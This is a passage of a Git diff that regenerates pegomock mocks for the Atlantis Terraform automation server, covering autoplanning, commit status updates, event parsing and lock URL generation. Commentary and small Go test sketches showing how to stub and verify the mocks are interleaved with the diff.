+func (c *CommandRunner_RunAutoplanCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.Repo, _param2 []models.PullRequest, _param3 []models.User) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.Repo, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.Repo)
+ }
+ _param1 = make([]models.Repo, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.Repo)
+ }
+ _param2 = make([]models.PullRequest, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(models.PullRequest)
+ }
+ _param3 = make([]models.User, len(params[3]))
+ for u, param := range params[3] {
+ _param3[u] = param.(models.User)
}
}
return
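
This regeneration tracks the CommandRunner interface split: the old ExecuteCommand becomes RunCommentCommand, whose head repo is now an optional *models.Repo (hence maybeHeadRepo, presumably nil when the head repo could not be determined), and RunAutoplanCommand is added for the new autoplanning path. A sketch of exercising the regenerated mock in a test, assuming pegomock's standard fail-handler setup (the test itself is illustrative, not part of this diff):

package events_test // hypothetical test file

import (
	"testing"

	pegomock "github.com/petergtz/pegomock"
	"github.com/runatlantis/atlantis/server/events/mocks"
	"github.com/runatlantis/atlantis/server/events/models"
)

func TestAutoplanIsTriggered(t *testing.T) {
	pegomock.RegisterMockTestingT(t) // route mock failures into this test
	cr := mocks.NewMockCommandRunner()

	var (
		baseRepo, headRepo models.Repo
		pull               models.PullRequest
		user               models.User
	)

	// The code under test would make this call; it is invoked directly here.
	cr.RunAutoplanCommand(baseRepo, headRepo, pull, user)

	// Fails the test unless RunAutoplanCommand ran exactly once with these args.
	cr.VerifyWasCalledOnce().RunAutoplanCommand(baseRepo, headRepo, pull, user)
}
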
diff --git a/server/events/mocks/mock_commit_status_updater.go b/server/events/mocks/mock_commit_status_updater.go
index 3ed9e933b4..e5815d4144 100644
--- a/server/events/mocks/mock_commit_status_updater.go
+++ b/server/events/mocks/mock_commit_status_updater.go
@@ -20,8 +20,8 @@ func NewMockCommitStatusUpdater() *MockCommitStatusUpdater {
return &MockCommitStatusUpdater{fail: pegomock.GlobalFailHandler}
}
-func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *events.Command) error {
- params := []pegomock.Param{repo, pull, status, cmd}
+func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command events.CommandName) error {
+ params := []pegomock.Param{repo, pull, status, command}
result := pegomock.GetGenericMockFrom(mock).Invoke("Update", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
var ret0 error
if len(result) != 0 {
@@ -32,8 +32,8 @@ func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRe
return ret0
}
-func (mock *MockCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, res events.CommandResponse) error {
- params := []pegomock.Param{ctx, res}
+func (mock *MockCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, commandName events.CommandName, res events.CommandResult) error {
+ params := []pegomock.Param{ctx, commandName, res}
result := pegomock.GetGenericMockFrom(mock).Invoke("UpdateProjectResult", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
var ret0 error
if len(result) != 0 {
@@ -62,8 +62,8 @@ type VerifierCommitStatusUpdater struct {
inOrderContext *pegomock.InOrderContext
}
-func (verifier *VerifierCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *events.Command) *CommitStatusUpdater_Update_OngoingVerification {
- params := []pegomock.Param{repo, pull, status, cmd}
+func (verifier *VerifierCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command events.CommandName) *CommitStatusUpdater_Update_OngoingVerification {
+ params := []pegomock.Param{repo, pull, status, command}
methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Update", params)
return &CommitStatusUpdater_Update_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
}
@@ -73,12 +73,12 @@ type CommitStatusUpdater_Update_OngoingVerification struct {
methodInvocations []pegomock.MethodInvocation
}
-func (c *CommitStatusUpdater_Update_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, vcs.CommitStatus, *events.Command) {
- repo, pull, status, cmd := c.GetAllCapturedArguments()
- return repo[len(repo)-1], pull[len(pull)-1], status[len(status)-1], cmd[len(cmd)-1]
+func (c *CommitStatusUpdater_Update_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, vcs.CommitStatus, events.CommandName) {
+ repo, pull, status, command := c.GetAllCapturedArguments()
+ return repo[len(repo)-1], pull[len(pull)-1], status[len(status)-1], command[len(command)-1]
}
-func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []vcs.CommitStatus, _param3 []*events.Command) {
+func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []vcs.CommitStatus, _param3 []events.CommandName) {
params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
if len(params) > 0 {
_param0 = make([]models.Repo, len(params[0]))
@@ -93,16 +93,16 @@ func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments
for u, param := range params[2] {
_param2[u] = param.(vcs.CommitStatus)
}
- _param3 = make([]*events.Command, len(params[3]))
+ _param3 = make([]events.CommandName, len(params[3]))
for u, param := range params[3] {
- _param3[u] = param.(*events.Command)
+ _param3[u] = param.(events.CommandName)
}
}
return
}
-func (verifier *VerifierCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, res events.CommandResponse) *CommitStatusUpdater_UpdateProjectResult_OngoingVerification {
- params := []pegomock.Param{ctx, res}
+func (verifier *VerifierCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, commandName events.CommandName, res events.CommandResult) *CommitStatusUpdater_UpdateProjectResult_OngoingVerification {
+ params := []pegomock.Param{ctx, commandName, res}
methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "UpdateProjectResult", params)
return &CommitStatusUpdater_UpdateProjectResult_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
}
@@ -112,21 +112,25 @@ type CommitStatusUpdater_UpdateProjectResult_OngoingVerification struct {
methodInvocations []pegomock.MethodInvocation
}
-func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetCapturedArguments() (*events.CommandContext, events.CommandResponse) {
- ctx, res := c.GetAllCapturedArguments()
- return ctx[len(ctx)-1], res[len(res)-1]
+func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetCapturedArguments() (*events.CommandContext, events.CommandName, events.CommandResult) {
+ ctx, commandName, res := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1], commandName[len(commandName)-1], res[len(res)-1]
}
-func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []events.CommandResponse) {
+func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []events.CommandName, _param2 []events.CommandResult) {
params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
if len(params) > 0 {
_param0 = make([]*events.CommandContext, len(params[0]))
for u, param := range params[0] {
_param0[u] = param.(*events.CommandContext)
}
- _param1 = make([]events.CommandResponse, len(params[1]))
+ _param1 = make([]events.CommandName, len(params[1]))
for u, param := range params[1] {
- _param1[u] = param.(events.CommandResponse)
+ _param1[u] = param.(events.CommandName)
+ }
+ _param2 = make([]events.CommandResult, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(events.CommandResult)
}
}
return
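
Update now takes a bare events.CommandName rather than a *events.Command, and UpdateProjectResult gains the command name alongside the CommandResponse-to-CommandResult rename. Stubbing a failure with the regenerated mock is straightforward (fragment; imports and setup as in the test sketch above, plus the errors and server/events/vcs packages):

u := mocks.NewMockCommitStatusUpdater()
var (
	repo    models.Repo
	pull    models.PullRequest
	status  vcs.CommitStatus   // zero value; a real test would pick a concrete status
	cmdName events.CommandName // likewise
)
// Any Update call with exactly these arguments returns the stubbed error.
pegomock.When(u.Update(repo, pull, status, cmdName)).
	ThenReturn(errors.New("status update failed"))
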
diff --git a/server/events/mocks/mock_event_parsing.go b/server/events/mocks/mock_event_parsing.go
index e88b581dce..1c1feaf31c 100644
--- a/server/events/mocks/mock_event_parsing.go
+++ b/server/events/mocks/mock_event_parsing.go
@@ -44,12 +44,13 @@ func (mock *MockEventParsing) ParseGithubIssueCommentEvent(comment *github.Issue
return ret0, ret1, ret2, ret3
}
-func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) {
+func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, models.Repo, error) {
params := []pegomock.Param{pull}
- result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPull", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPull", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
var ret0 models.PullRequest
var ret1 models.Repo
- var ret2 error
+ var ret2 models.Repo
+ var ret3 error
if len(result) != 0 {
if result[0] != nil {
ret0 = result[0].(models.PullRequest)
@@ -58,10 +59,41 @@ func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.
ret1 = result[1].(models.Repo)
}
if result[2] != nil {
- ret2 = result[2].(error)
+ ret2 = result[2].(models.Repo)
+ }
+ if result[3] != nil {
+ ret3 = result[3].(error)
}
}
- return ret0, ret1, ret2
+ return ret0, ret1, ret2, ret3
+}
+
+func (mock *MockEventParsing) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
+ params := []pegomock.Param{pullEvent}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPullEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.User)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 models.PullRequest
+ var ret1 models.Repo
+ var ret2 models.Repo
+ var ret3 models.User
+ var ret4 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(models.PullRequest)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(models.Repo)
+ }
+ if result[2] != nil {
+ ret2 = result[2].(models.Repo)
+ }
+ if result[3] != nil {
+ ret3 = result[3].(models.User)
+ }
+ if result[4] != nil {
+ ret4 = result[4].(error)
+ }
+ }
+ return ret0, ret1, ret2, ret3, ret4
}
func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) {
@@ -80,12 +112,14 @@ func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models
return ret0, ret1
}
-func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, error) {
+func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
params := []pegomock.Param{event}
- result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.User)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
var ret0 models.PullRequest
var ret1 models.Repo
- var ret2 error
+ var ret2 models.Repo
+ var ret3 models.User
+ var ret4 error
if len(result) != 0 {
if result[0] != nil {
ret0 = result[0].(models.PullRequest)
@@ -94,10 +128,16 @@ func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent)
ret1 = result[1].(models.Repo)
}
if result[2] != nil {
- ret2 = result[2].(error)
+ ret2 = result[2].(models.Repo)
+ }
+ if result[3] != nil {
+ ret3 = result[3].(models.User)
+ }
+ if result[4] != nil {
+ ret4 = result[4].(error)
}
}
- return ret0, ret1, ret2
+ return ret0, ret1, ret2, ret3, ret4
}
func (mock *MockEventParsing) ParseGitlabMergeCommentEvent(event go_gitlab.MergeCommentEvent) (models.Repo, models.Repo, models.User, error) {
@@ -208,6 +248,33 @@ func (c *EventParsing_ParseGithubPull_OngoingVerification) GetAllCapturedArgumen
return
}
+func (verifier *VerifierEventParsing) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) *EventParsing_ParseGithubPullEvent_OngoingVerification {
+ params := []pegomock.Param{pullEvent}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseGithubPullEvent", params)
+ return &EventParsing_ParseGithubPullEvent_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type EventParsing_ParseGithubPullEvent_OngoingVerification struct {
+ mock *MockEventParsing
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *EventParsing_ParseGithubPullEvent_OngoingVerification) GetCapturedArguments() *github.PullRequestEvent {
+ pullEvent := c.GetAllCapturedArguments()
+ return pullEvent[len(pullEvent)-1]
+}
+
+func (c *EventParsing_ParseGithubPullEvent_OngoingVerification) GetAllCapturedArguments() (_param0 []*github.PullRequestEvent) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*github.PullRequestEvent, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*github.PullRequestEvent)
+ }
+ }
+ return
+}
+
func (verifier *VerifierEventParsing) ParseGithubRepo(ghRepo *github.Repository) *EventParsing_ParseGithubRepo_OngoingVerification {
params := []pegomock.Param{ghRepo}
methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseGithubRepo", params)
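
ParseGithubPull now returns a second models.Repo (base then head, judging by the argument ordering used elsewhere in this diff), and the new ParseGithubPullEvent mock covers the pull-request webhook that drives autoplanning. An illustrative stub of the four-value return (fragment; the repo names are an assumption, since the interface itself is not shown here):

ep := mocks.NewMockEventParsing()
var (
	pull               models.PullRequest
	baseRepo, headRepo models.Repo
)
// Matches calls made with the same (nil) argument; a real test would pass a real pull.
pegomock.When(ep.ParseGithubPull(nil)).ThenReturn(pull, baseRepo, headRepo, nil)
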
diff --git a/server/events/mocks/mock_executor.go b/server/events/mocks/mock_executor.go
deleted file mode 100644
index f3c9ce749b..0000000000
--- a/server/events/mocks/mock_executor.go
+++ /dev/null
@@ -1,76 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: Executor)
-
-package mocks
-
-import (
- "reflect"
-
- pegomock "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
-)
-
-type MockExecutor struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockExecutor() *MockExecutor {
- return &MockExecutor{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockExecutor) Execute(ctx *events.CommandContext) events.CommandResponse {
- params := []pegomock.Param{ctx}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()})
- var ret0 events.CommandResponse
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(events.CommandResponse)
- }
- }
- return ret0
-}
-
-func (mock *MockExecutor) VerifyWasCalledOnce() *VerifierExecutor {
- return &VerifierExecutor{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockExecutor) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierExecutor {
- return &VerifierExecutor{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockExecutor) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierExecutor {
- return &VerifierExecutor{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierExecutor struct {
- mock *MockExecutor
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierExecutor) Execute(ctx *events.CommandContext) *Executor_Execute_OngoingVerification {
- params := []pegomock.Param{ctx}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params)
- return &Executor_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type Executor_Execute_OngoingVerification struct {
- mock *MockExecutor
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *Executor_Execute_OngoingVerification) GetCapturedArguments() *events.CommandContext {
- ctx := c.GetAllCapturedArguments()
- return ctx[len(ctx)-1]
-}
-
-func (c *Executor_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]*events.CommandContext, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(*events.CommandContext)
- }
- }
- return
-}
diff --git a/server/events/mocks/mock_lock_url_generator.go b/server/events/mocks/mock_lock_url_generator.go
index 0a31fc85f8..8a62a2c3b2 100644
--- a/server/events/mocks/mock_lock_url_generator.go
+++ b/server/events/mocks/mock_lock_url_generator.go
@@ -17,9 +17,16 @@ func NewMockLockURLGenerator() *MockLockURLGenerator {
return &MockLockURLGenerator{fail: pegomock.GlobalFailHandler}
}
-func (mock *MockLockURLGenerator) SetLockURL(_param0 func(string) string) {
- params := []pegomock.Param{_param0}
- pegomock.GetGenericMockFrom(mock).Invoke("SetLockURL", params, []reflect.Type{})
+func (mock *MockLockURLGenerator) GenerateLockURL(lockID string) string {
+ params := []pegomock.Param{lockID}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("GenerateLockURL", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem()})
+ var ret0 string
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(string)
+ }
+ }
+ return ret0
}
func (mock *MockLockURLGenerator) VerifyWasCalledOnce() *VerifierLockURLGenerator {
@@ -40,28 +47,28 @@ type VerifierLockURLGenerator struct {
inOrderContext *pegomock.InOrderContext
}
-func (verifier *VerifierLockURLGenerator) SetLockURL(_param0 func(string) string) *LockURLGenerator_SetLockURL_OngoingVerification {
- params := []pegomock.Param{_param0}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "SetLockURL", params)
- return &LockURLGenerator_SetLockURL_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+func (verifier *VerifierLockURLGenerator) GenerateLockURL(lockID string) *LockURLGenerator_GenerateLockURL_OngoingVerification {
+ params := []pegomock.Param{lockID}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "GenerateLockURL", params)
+ return &LockURLGenerator_GenerateLockURL_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
}
-type LockURLGenerator_SetLockURL_OngoingVerification struct {
+type LockURLGenerator_GenerateLockURL_OngoingVerification struct {
mock *MockLockURLGenerator
methodInvocations []pegomock.MethodInvocation
}
-func (c *LockURLGenerator_SetLockURL_OngoingVerification) GetCapturedArguments() func(string) string {
- _param0 := c.GetAllCapturedArguments()
- return _param0[len(_param0)-1]
+func (c *LockURLGenerator_GenerateLockURL_OngoingVerification) GetCapturedArguments() string {
+ lockID := c.GetAllCapturedArguments()
+ return lockID[len(lockID)-1]
}
-func (c *LockURLGenerator_SetLockURL_OngoingVerification) GetAllCapturedArguments() (_param0 []func(string) string) {
+func (c *LockURLGenerator_GenerateLockURL_OngoingVerification) GetAllCapturedArguments() (_param0 []string) {
params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
if len(params) > 0 {
- _param0 = make([]func(string) string, len(params[0]))
+ _param0 = make([]string, len(params[0]))
for u, param := range params[0] {
- _param0[u] = param.(func(string) string)
+ _param0[u] = param.(string)
}
}
return
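
The interface flips from injecting a URL-building closure (SetLockURL) to computing the URL itself (GenerateLockURL), trading the hard-to-match func(string) string parameter above for a plain string, which makes stubbing trivial (fragment, illustrative values):

g := mocks.NewMockLockURLGenerator()
pegomock.When(g.GenerateLockURL("some-lock-id")).
	ThenReturn("https://atlantis.example.com/lock?id=some-lock-id")
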
diff --git a/server/events/mocks/mock_project_command_builder.go b/server/events/mocks/mock_project_command_builder.go
new file mode 100644
index 0000000000..f779acab36
--- /dev/null
+++ b/server/events/mocks/mock_project_command_builder.go
@@ -0,0 +1,175 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectCommandBuilder)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockProjectCommandBuilder struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockProjectCommandBuilder() *MockProjectCommandBuilder {
+ return &MockProjectCommandBuilder{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockProjectCommandBuilder) BuildAutoplanCommands(ctx *events.CommandContext) ([]models.ProjectCommandContext, error) {
+ params := []pegomock.Param{ctx}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("BuildAutoplanCommands", params, []reflect.Type{reflect.TypeOf((*[]models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 []models.ProjectCommandContext
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].([]models.ProjectCommandContext)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockProjectCommandBuilder) BuildPlanCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) (models.ProjectCommandContext, error) {
+ params := []pegomock.Param{ctx, commentCommand}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("BuildPlanCommand", params, []reflect.Type{reflect.TypeOf((*models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 models.ProjectCommandContext
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(models.ProjectCommandContext)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockProjectCommandBuilder) BuildApplyCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) (models.ProjectCommandContext, error) {
+ params := []pegomock.Param{ctx, commentCommand}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("BuildApplyCommand", params, []reflect.Type{reflect.TypeOf((*models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 models.ProjectCommandContext
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(models.ProjectCommandContext)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockProjectCommandBuilder) VerifyWasCalledOnce() *VerifierProjectCommandBuilder {
+ return &VerifierProjectCommandBuilder{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockProjectCommandBuilder) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectCommandBuilder {
+ return &VerifierProjectCommandBuilder{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockProjectCommandBuilder) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectCommandBuilder {
+ return &VerifierProjectCommandBuilder{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierProjectCommandBuilder struct {
+ mock *MockProjectCommandBuilder
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierProjectCommandBuilder) BuildAutoplanCommands(ctx *events.CommandContext) *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification {
+ params := []pegomock.Param{ctx}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildAutoplanCommands", params)
+ return &ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification struct {
+ mock *MockProjectCommandBuilder
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification) GetCapturedArguments() *events.CommandContext {
+ ctx := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1]
+}
+
+func (c *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*events.CommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*events.CommandContext)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierProjectCommandBuilder) BuildPlanCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification {
+ params := []pegomock.Param{ctx, commentCommand}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildPlanCommand", params)
+ return &ProjectCommandBuilder_BuildPlanCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandBuilder_BuildPlanCommand_OngoingVerification struct {
+ mock *MockProjectCommandBuilder
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification) GetCapturedArguments() (*events.CommandContext, *events.CommentCommand) {
+ ctx, commentCommand := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1], commentCommand[len(commentCommand)-1]
+}
+
+func (c *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []*events.CommentCommand) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*events.CommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*events.CommandContext)
+ }
+ _param1 = make([]*events.CommentCommand, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(*events.CommentCommand)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierProjectCommandBuilder) BuildApplyCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification {
+ params := []pegomock.Param{ctx, commentCommand}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildApplyCommand", params)
+ return &ProjectCommandBuilder_BuildApplyCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandBuilder_BuildApplyCommand_OngoingVerification struct {
+ mock *MockProjectCommandBuilder
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification) GetCapturedArguments() (*events.CommandContext, *events.CommentCommand) {
+ ctx, commentCommand := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1], commentCommand[len(commentCommand)-1]
+}
+
+func (c *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []*events.CommentCommand) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*events.CommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*events.CommandContext)
+ }
+ _param1 = make([]*events.CommentCommand, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(*events.CommentCommand)
+ }
+ }
+ return
+}
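
ProjectCommandBuilder is the planning half of the new command pipeline: judging by its signature, BuildAutoplanCommands fans one pull request out into zero or more per-project contexts, while BuildPlanCommand and BuildApplyCommand each resolve a single comment-triggered command. A sketch of stubbing an autoplan that matches two projects (fragment, illustrative):

b := mocks.NewMockProjectCommandBuilder()
ctx := &events.CommandContext{} // empty context; a real test would populate repo/pull fields
pegomock.When(b.BuildAutoplanCommands(ctx)).
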